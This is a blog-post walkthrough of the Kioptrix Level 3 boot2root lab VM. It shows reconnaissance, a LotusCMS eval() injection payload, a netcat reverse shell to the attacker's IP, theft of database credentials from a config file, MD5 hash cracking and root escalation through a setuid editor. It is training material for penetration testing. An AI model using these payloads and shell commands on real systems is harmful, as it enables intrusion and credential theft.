<!DOCTYPE html>
<html lang="en">

<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="description" content="">
  <meta name="generator" content="Hugo 0.21-DEV" />

  <title>Kioptrix Level 1.2 (Level 3) &middot; Leonardo Ferreira</title>

  
  
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pure/0.6.0/pure-min.css">

  <!--[if lte IE 8]>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pure/0.6.0/grids-responsive-old-ie-min.css">
  <![endif]-->
  <!--[if gt IE 8]><!-->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pure/0.6.0/grids-responsive-min.css">
  <!--<![endif]-->

  <!--[if lte IE 8]>
  <link rel="stylesheet" href="https://ferreirasc.github.io/css/side-menu-old-ie.css">
  <![endif]-->
  <!--[if gt IE 8]><!-->
  <link rel="stylesheet" href="https://ferreirasc.github.io/css/side-menu.css">
  <!--<![endif]-->

  <link rel="stylesheet" href="https://ferreirasc.github.io/css/blackburn.css">

  
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">

  
  <link href="https://fonts.googleapis.com/css?family=Raleway" rel="stylesheet" type="text/css">

  
 

  
  <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.1.0/styles/androidstudio.min.css">
  <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.1.0/highlight.min.js"></script>
  <script>hljs.initHighlightingOnLoad();</script>
  

  <link rel="shortcut icon" href="https://ferreirasc.github.io/img/favicon.ico" type="image/x-icon" />

</head>


<body>
<div id="layout">

  
<a href="#menu" id="menuLink" class="menu-link">
  
  <span></span>
</a>
<div id="menu">

  
  <a class="pure-menu-heading brand" href="https://ferreirasc.github.io/">Léo Ferreira</a>
  <ul>  
	<div id="avatar">
  </ul>


  <div class="pure-menu">
    <ul class="pure-menu-list">
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="https://ferreirasc.github.io/"><i class='fa fa-home fa-fw'></i>Home</a>
      
        </li>
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="https://ferreirasc.github.io/post/"><i class='fa fa-list fa-fw'></i>Posts</a>
      
        </li>
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="https://ferreirasc.github.io/topics/"><i class='fa fa-folder fa-fw'></i>Topics</a>
      
        </li>
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="https://ferreirasc.github.io/tags/"><i class='fa fa-tags fa-fw'></i>Tags</a>
      
        </li>
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="https://ferreirasc.github.io/about/"><i class='fa fa-user fa-fw'></i>About</a>
      
        </li>
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="https://ferreirasc.github.io/contact/"><i class='fa fa-phone fa-fw'></i>Contact</a>
      
        </li>
      
    </ul>
  </div>

  <div class="pure-menu social">
  <ul class="pure-menu-list">

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    
    <li class="pure-menu-item">
      <a class="pure-menu-link" href="https://linkedin.com/in/leonardo-meneses" target="_blank"><i class="fa fa-linkedin-square fa-fw"></i>LinkedIn</a>
    </li>
    

    

    

    

    

    

    
    <li class="pure-menu-item">
      <a class="pure-menu-link" href="https://github.com/ferreirasc" target="_blank"><i class="fa fa-github-square fa-fw"></i>GitHub</a>
    </li>
    

    

    

    

    

    

    

    

  </ul>
</div>


  <div>
  <div class="small-print">
    <small>&copy; 2016. All rights reserved.</small>
  </div>
  <div class="small-print">
    <small>Built with&nbsp;<a href="https://gohugo.io/" target="_blank">Hugo</a></small>
    <small>Theme&nbsp;<a href="https://github.com/yoshiharuyamashita/blackburn" target="_blank">Blackburn</a></small>
  </div>
</div>

</div>


  <div id="main">


<div class="header">
  <h1>Kioptrix Level 1.2 (Level 3)</h1>
  <h2></h2>
</div>
<div class="content">

  <div class="post-meta">

  <div>
    <i class="fa fa-calendar fa-fw"></i>
    <time>30 Jul 2017, 22:22</time>
  </div>

  

  
  
  
  <div>
    <i class="fa fa-folder fa-fw"></i>
    
      <a class="post-taxonomy-topic" href="https://ferreirasc.github.io/topics/boot2root">boot2root</a>
    
  </div>
  
  

  
  
  
  <div>
    <i class="fa fa-tags fa-fw"></i>
    
      <a class="post-taxonomy-tag" href="https://ferreirasc.github.io/tags/boot2root">boot2root</a>&nbsp;&#47;
    
      <a class="post-taxonomy-tag" href="https://ferreirasc.github.io/tags/kioptrix">kioptrix</a>&nbsp;&#47;
    
      <a class="post-taxonomy-tag" href="https://ferreirasc.github.io/tags/hacking">hacking</a>&nbsp;&#47;
    
      <a class="post-taxonomy-tag" href="https://ferreirasc.github.io/tags/oscp">oscp</a>
    
  </div>
  
  

</div>

  <p>Let&rsquo;s take a look at the level 3 of Kioptrix series. This level is a little more tricky than previous two. I&rsquo;ll show one of two possible solutions for this challenge and just comment the second solution at the end.</p>

<p>Again, this VM can be found at <a href="http://www.kioptrix.com/"/>Kioptrix webpage</a>.</p>

<p></p>

<p>Let&rsquo;s get started scanning my network range to discover the Kioptrix level 3 VM:</p>

<pre><code class="language-bash">root@kali:~# nmap -sn 192.168.3.0/24

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-28 00:41 EDT
&lt;-- omitted information --&gt;
Nmap scan report for 192.168.3.92
Host is up (-0.20s latency).
MAC Address: 00:0C:29:9C:A7:C9 (VMware)
&lt;-- omitted information --&gt;
Nmap done: 256 IP addresses (7 hosts up) scanned in 31.66 seconds
</code></pre>

<p>Once I discovered the address of Kioptrix is mapped to &ldquo;192.168.3.92&rdquo; on my network, I can enumerate your running services using nmap again:</p>

<pre><code class="language-bash">root@roarrr:/Users/ferreirasc$nmap -sS -sC -sV -Pn -n 192.168.3.92

Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-29 19:16 -03
Nmap scan report for kioptrix3.com (192.168.3.92)
Host is up (0.0058s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:9C:A7:C9 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.65 seconds
</code></pre>

<p>Ok, we have two services running: SSH server and a web server listening on port 80 with the HTTP-title &ldquo;Ligoat Security - Got Goat? Security&rdquo;. Apparently, there is no problem with the service versions. Let&rsquo;s take a look at this webpage:</p>


<img class="pure-img" src="../images/image1_kioptrix3.png" alt="">


<p>It&rsquo;s a blog with some posts, including an interesting post that refers to &ldquo;new lead programmer&rdquo; called &ldquo;<strong>loneferret</strong>&rdquo;. This leads me to believe that this one could be a valid username somewhere in the application. Navigating by the website, I discovered a login page revealing that the application could have been built using a <strong>Lotus CMS</strong> (which has multiple vulnerabilities, according to exploit-db :-P ) :</p>


<img class="pure-img" src="../images/image2_kioptrix3.png" alt="">


<p>I decided to do a little more enumeration, this time, using <em>dirb</em> to fuzzing directories and <em>wig</em> to discover details of the web application:</p>

<p><strong>Dirb:</strong></p>

<pre><code class="language-bash">root@kali:~# dirb http://192.168.3.92/ /usr/share/wordlists/dirb/common.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Jul 28 00:48:38 2017
URL_BASE: http://192.168.3.92/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.3.92/ ----
==&gt; DIRECTORY: http://192.168.3.92/cache/
==&gt; DIRECTORY: http://192.168.3.92/core/
+ http://192.168.3.92/data (CODE:403|SIZE:323)
+ http://192.168.3.92/favicon.ico (CODE:200|SIZE:23126)
==&gt; DIRECTORY: http://192.168.3.92/gallery/
+ http://192.168.3.92/index.php (CODE:200|SIZE:1819)
==&gt; DIRECTORY: http://192.168.3.92/modules/
==&gt; DIRECTORY: http://192.168.3.92/phpmyadmin/
+ http://192.168.3.92/server-status (CODE:403|SIZE:332)
==&gt; DIRECTORY: http://192.168.3.92/style/

&lt;----- a lot of omitted informations... -----&gt;
</code></pre>

<p><strong>Wig:</strong></p>

<pre><code class="language-bash">ferreirasc@roarrr:~/pentest/web/identify-cms/wig$wig http://192.168.3.92/

wig - WebApp Information Gatherer


Scanning http://192.168.3.92/...
___________________________________________ SITE INFO ____________________________________________
IP                              Title
192.168.3.92                    Ligoat Security - Got Goat? Security ...

____________________________________________ VERSION _____________________________________________
Name                            Versions                       Type
phpMyAdmin                      2.11.3                         CMS
Apache                          2.2.8                          Platform
PHP                             5.2.4-2ubuntu5.6               Platform
suhosin-patch                                                  Platform
with                                                           Platform
Ubuntu                          8.04                           OS

__________________________________________ INTERESTING ___________________________________________
URL                             Note                           Type
/phpmyadmin/                    PHPMyAdmin page                Interesting
/phpmyadmin/Documentation.html  phpMyAdmin Documentation page  Interesting

________________________________________ VULNERABILITIES _________________________________________
Affected                        #Vulns                         Link
phpMyAdmin 2.11.3               16                             http://cvedetails.com/version/52820

__________________________________________________________________________________________________
Time: 6.1 sec                   Urls: 412                      Fingerprints: 40401
</code></pre>

<p>Ok, some listable directories revealing modules, plugins (probably of LotusCMS) and a phpmyadmin 2.11.3 running on backend of application. Good, now we know that a MySQL dbms is running at the VM in localhost.</p>

<p>A quick search on google with the dork &ldquo;lotuscms exploit-db&rdquo; reveals a lot of vulnerabilities of this CMS in your 3.0 version. Including an existing exploit in metasploit to take advantage of eval() in the application through of &ldquo;page&rdquo; variable on URI <strong>&ldquo;index.php?page=index&rdquo;</strong>. I really don&rsquo;t know if the CMS is in your 3.0 version, but it doesn&rsquo;t hurt to try :D</p>

<p>For this walkthrough, I&rsquo;m going to avoid the metasploit-fu. Searching a little more for this vulnerability on Google, I discovered that the vulnerability (or one of them) is in the php file <strong>core/lib/router.php</strong>:</p>

<pre><code class="language-php">//If there is a request for a plugin
if(file_exists(&quot;core/plugs/&quot;.$plugin.&quot;Starter.php&quot;)){
//Include Page fetcher
	include(&quot;core/plugs/&quot;.$plugin.&quot;Starter.php&quot;);
	//Fetch the page and get over loading cache etc...
	eval(&quot;new &quot;.$plugin.&quot;Starter('&quot;.$page.&quot;');&quot;);
}
</code></pre>

<p>The variable &ldquo;page&rdquo; is being passed to a eval() call without any sanitization.  We can take advantage of this exploring the page variable and allowing remote code execution (RCE) in the application. If we input &ldquo; <strong>index&rsquo;);system(&lsquo;id&rsquo;);#</strong> &ldquo;, this will be passed to the application like:</p>

<pre><code class="language-php">//If there is a request for a plugin
if(file_exists(&quot;core/plugs/&quot;.$plugin.&quot;Starter.php&quot;)){
//Include Page fetcher
    include(&quot;core/plugs/&quot;.$plugin.&quot;Starter.php&quot;);
    //Fetch the page and get over loading cache etc...
    eval(&quot;new &quot;.$plugin.&quot;Starter('index');system('id');#');&quot;);
}
</code></pre>

<p>If the vulnerability is present and if everything works fine, an &ldquo;id&rdquo; information will be showed in the page. Let&rsquo;s check it out:</p>


<img class="pure-img" src="../images/image3_kioptrix3.png" alt="">


<p>Great! I&rsquo;ve a RCE. Time to reverse shell.</p>

<p>Let&rsquo;s input &ldquo; <strong>index&rsquo;);system(&lsquo;nc &lt;attacker_ip&gt; -e /bin/sh&rsquo;);#</strong> &ldquo; to connect-back the webapp on my listener:</p>

<pre><code class="language-bash">root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
192.168.3.92: inverse host lookup failed: Unknown host
connect to [192.168.3.91] from (UNKNOWN) [192.168.3.92] 42590
python -c 'import pty;pty.spawn(&quot;/bin/bash&quot;);'
www-data@Kioptrix3:/home/www/kioptrix3.com$
</code></pre>

<p>As seen above, I needed to &ldquo;upgrade&rdquo; my shell for a PTY (pseudo-terminal) version using python. This is not at all like a complete and all-powerful TTY, but it helps. You can see more techniques to upgrade simple shells here. Knowing these techniques can be very useful in a pentest.</p>

<p>Now, knowing that the web application communicates with a database in backend, I decided to discover the login and password for access this one. I will recursively search for the string &ldquo;pass&rdquo; from this directory using a <em>grep</em> command:</p>

<pre><code class="language-bash">www-data@Kioptrix3:/home/www/kioptrix3.com$ls -lah
total 92K
drwxr-xr-x  8 root root 4.0K 2011-04-15 16:24 .
drwxr-xr-x  3 root root 4.0K 2011-04-12 11:58 ..
drwxrwxrwx  2 root root 4.0K 2011-04-15 09:21 cache
drwxrwxrwx  8 root root 4.0K 2011-04-14 12:23 core
drwxrwxrwx  8 root root 4.0K 2011-04-14 12:23 data
-rw-r--r--  1 root root  23K 2009-06-05 15:22 favicon.ico
drwxr-xr-x  7 root root 4.0K 2011-04-14 11:32 gallery
-rw-r--r--  1 root root  26K 2007-01-21 18:36 gnu-lgpl.txt
-rw-r--r--  1 root root  399 2011-02-23 13:29 index.php
drwxrwxrwx 10 root root 4.0K 2011-04-14 12:23 modules
drwxrwxrwx  3 root root 4.0K 2011-04-14 12:23 style
-rw-r--r--  1 root root  243 2010-08-05 19:39 update.php

www-data@Kioptrix3:/home/www/kioptrix3.com$grep -ir &quot;pass&quot; .
&lt;--- a lot of omitted information ---&gt;
grep: ./gallery/scopbin/911006.php.save: Permission denied
./gallery/gconfig.php:	$GLOBALS[&quot;gallarific_mysql_password&quot;] = &quot;fuckeyou&quot;;
./gallery/gconfig.php:if(!$g_mysql_c = @mysql_connect($GLOBALS[&quot;gallarific_mysql_server&quot;], $GLOBALS[&quot;gallarific_mysql_username&quot;], $GLOBALS[&quot;gallarific_mysql_password&quot;])) {
&lt;--- a lot of omitted information ---&gt;

www-data@Kioptrix3:/home/www/kioptrix3.com$cat gallery/gconfig.php
&lt;--- a lot of omitted information ---&gt;
// Installer Details -----------------------------------------------

	// Enter the full HTTP path to your Gallarific folder below,
	// such as http://www.yoursite.com/gallery
	// Do NOT include a trailing forward slash

	$GLOBALS[&quot;gallarific_path&quot;] = &quot;http://kioptrix3.com/gallery&quot;;

	$GLOBALS[&quot;gallarific_mysql_server&quot;] = &quot;localhost&quot;;
	$GLOBALS[&quot;gallarific_mysql_database&quot;] = &quot;gallery&quot;;
	$GLOBALS[&quot;gallarific_mysql_username&quot;] = &quot;root&quot;;
	$GLOBALS[&quot;gallarific_mysql_password&quot;] = &quot;fuckeyou&quot;;
&lt;--- a lot of omitted information ---&gt;
</code></pre>

<p>Ok, now we have root access on &ldquo;gallery&rdquo; database with the password &ldquo;fuckeyou&rdquo; (lol). Let&rsquo;s try to connect:</p>

<pre><code class="language-bash">www-data@Kioptrix3:/home/www/kioptrix3.com$mysql -u root -D gallery -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql&gt; show tables;
+----------------------+
| Tables_in_gallery    |
+----------------------+
| dev_accounts         |
| gallarific_comments  |
| gallarific_galleries |
| gallarific_photos    |
| gallarific_settings  |
| gallarific_stats     |
| gallarific_users     |
+----------------------+
7 rows in set (0.00 sec)

mysql&gt;select * from dev_accounts;
+----+------------+----------------------------------+
| id | username   | password                         |
+----+------------+----------------------------------+
|  1 | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 |
|  2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+
2 rows in set (0.01 sec)
</code></pre>

<p>The gallery database has two developer accounts: &ldquo;dreg&rdquo; and &ldquo;lone ferret&rdquo; (remember him?). Let&rsquo;s see if john can crack these hashes:</p>

<pre><code class="language-bash">ferreirasc@roarrr:~$echo -e 'dreg:0d3eccfb887aabd50f243b3f155c0f85\x10loneferret:5badcaf789d3d1d09794d8f021f40f0e' &gt; /tmp/hashes
ferreirasc@roarrr:~$john /tmp/hashes --format=raw-md5
Created directory: /Users/ferreirasc/.john
Loaded 2 password hashes with no different salts (Raw-MD5 [MD5 128/128 SSSE3 20x])
Press 'q' or Ctrl-C to abort, almost any other key for status
starwars         (loneferret)
1g 0:00:00:36  3/3 0.02712g/s 7830Kp/s 7830Kc/s 7830KC/s bkrkki..bkrk50
Use the &quot;--show&quot; option to display all of the cracked passwords reliably
Session aborted
</code></pre>

<p>John was able to crack the &ldquo;loneferret&rdquo; password (<strong>starwars</strong>), but took a lot of time to try breaking &ldquo;dreg&rdquo; password. No problem, Google told me that your password is &ldquo;<strong>Mast3r</strong>&rdquo;. Looking at the file &ldquo;/etc/passwd&rdquo;, I figured out that the system also has &ldquo;loneferret&rdquo; and &ldquo;dreg&rdquo; as users, maybe they use the same password on it. Let&rsquo;s try logging onto the server as loneferret using ssh:</p>

<pre><code class="language-bash">ferreirasc@roarrr:~$ssh loneferret@192.168.3.92
loneferret@192.168.3.93's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sun Jul 30 15:38:15 2017 from 192.168.3.27
loneferret@Kioptrix3:~$id
uid=1000(loneferret) gid=100(users) groups=100(users)
</code></pre>

<p>I&rsquo;m in on &ldquo;loneferret&rdquo;. Navigating by your home directory, we will see a file called &ldquo;CompanyPolicy.README&rdquo; with the message:</p>

<pre><code>Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
</code></pre>

<p>As said, the &ldquo;ht&rdquo; software (by the way, a good software for editing binaries) apparently can be executed with root privileges.</p>

<pre><code class="language-bash">loneferret@Kioptrix3:~$ls -lah `which ht`
-rwsr-sr-x 1 root root 2.0M 2011-04-16 07:26 /usr/local/bin/ht
loneferret@Kioptrix3:~$ht
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$export TERM=xterm
</code></pre>

<p>A setuid flag allows me to run an executable with the permissions of the executable&rsquo;s owner, in this case, root. So, I can take advantage of the ht binary to edit something like a sudoers file (or /etc/shadow, create a cron, so on) to get root on the system.</p>


<img class="pure-img" src="../images/image4_kioptrix3.png" alt="">


<p>Adding all privileges to loneferret:</p>


<img class="pure-img" src="../images/image5_kioptrix3.png" alt="">


<p>Finally, I got root on the system:</p>

<pre><code class="language-bash">loneferret@Kioptrix3:~$ sudo su
root@Kioptrix3:/home/loneferret# id
uid=0(root) gid=0(root) groups=0(root)
</code></pre>

<h2 id="second-solution">Second solution</h2>

<p>There is a SQL injection vulnerability with the Kioptrix3 gallery that can be exploited by the parameter &ldquo;id&rdquo; at URI &ldquo;<strong>gallery/gallery.php?id=1</strong>&rdquo;.</p>

<p>I can logging in the application with the users discovered by the database and upload a embedded php in an image to invoking a reverse shell to my machine.</p>

  
<div class="prev-next-post pure-g">
  <div class="pure-u-1-24" style="text-align: left;">
    
    <a href="https://ferreirasc.github.io/post/kioptrix_level_1_1/"><i class="fa fa-chevron-left"></i></a>
    
  </div>
  <div class="pure-u-10-24">
    
    <nav class="prev">
      <a href="https://ferreirasc.github.io/post/kioptrix_level_1_1/">Kioptrix Level 1.1 (Level 2)</a>
    </nav>
    
  </div>
  <div class="pure-u-2-24">
    &nbsp;
  </div>
  <div class="pure-u-10-24">
    
  </div>
  <div class="pure-u-1-24" style="text-align: right;">
    
  </div>
</div>



  
<div id="disqus_thread"></div>
<script type="text/javascript">

(function() {
    
    
    if (window.location.hostname == "localhost")
        return;

    var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
    var disqus_shortname = 'Your Disqus shortname';
    dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
    (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="http://disqus.com/" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>


</div>

</div>
</div>
<script src="https://ferreirasc.github.io/js/ui.js"></script>


<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'Your Google Analytics tracking ID', 'auto');
  ga('send', 'pageview');

</script>



</body>
</html>

